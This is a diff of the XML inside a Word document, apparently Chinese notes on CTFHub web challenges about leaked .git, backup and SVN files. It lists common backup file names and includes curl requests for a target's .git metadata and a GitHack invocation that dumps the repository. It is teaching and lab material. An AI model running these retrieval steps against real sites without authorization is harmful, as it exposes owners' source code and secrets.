+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>ctfhub{dc8b0894d5a5689a22a35ffe}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:color w:val="2E548A"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>题目 2 · Git Stash</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2631,7 +2169,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">      c=$(git cat-file -p "$h" 2&gt;/dev/null | grep -oE '(ctfhub|flag)\{[^}]*\}' | head -1)</w:t>
+        <w:t>curl -s "$T/.git/HEAD"              # ref: refs/heads/master</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2645,7 +2183,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">      [ -n "$c" ] &amp;&amp; echo "★ $h → $c"</w:t>
+        <w:t>curl -s "$T/.git/logs/HEAD"         # 4 条 ← 注意比上一题多一行</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2659,535 +2197,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">    done</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="40"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:color w:val="2E548A"/>
-          <w:sz w:val="25"/>
-        </w:rPr>
-        <w:t>2.2.2 备份文件下载</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>六个载体：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>网站源码包</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>www.zip</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> / </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>web.tar.gz</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> / </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>backup.zip</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> / </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>site.rar</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>后缀变体</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>.bak</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>.old</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>.orig</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>.save</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>.swp</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>.copy</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>.tmp</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>.txt</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>.1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>~</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>编辑器缓存</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>（vim 系列，见 2.3）</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>系统元数据</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>.DS_Store</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> / </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>Thumbs.db</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> / </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>desktop.ini</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>配置密钥</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>.env</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> / </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>Dockerfile</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> / </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>docker-compose.yml</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> / </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>.gitlab-ci.yml</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>IDE 工程</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>.idea/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> / </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>.vscode/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> / </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>.settings/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> / </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>*.iml</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>为什么 `.bak` 能读源码</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：服务器按</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>最后扩展名</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>决定解析。</w:t>
+        <w:t>cd ~/tools/githack/GitHack-master</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3201,7 +2211,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>index.php.bak  →  .bak  →  静态文件  →  原样输出 ✅ 泄露</w:t>
+        <w:t>python2 GitHack.py "$T/.git"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3215,313 +2225,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>index.bak.php  →  .php  →  交给 PHP  →  不泄露</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="40"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:color w:val="2E548A"/>
-          <w:sz w:val="25"/>
-        </w:rPr>
-        <w:t>2.2.3 SVN 泄露</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>成因</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">：在 web 目录 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>svn checkout</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>，</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>.svn</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 留在 web 根。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>正确做法</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>svn export</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">（不带 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>.svn</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>）。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>两代结构：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>≤ 1.6</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>.svn</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 位置：每个子目录</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>元数据：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>entries</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>（纯文本，有文件列表）</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>内容：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>text-base/&lt;名&gt;.svn-base</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>≥ 1.7</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>.svn</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 位置：只有根目录</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>元数据：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>wc.db</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>（SQLite）</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>内容：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
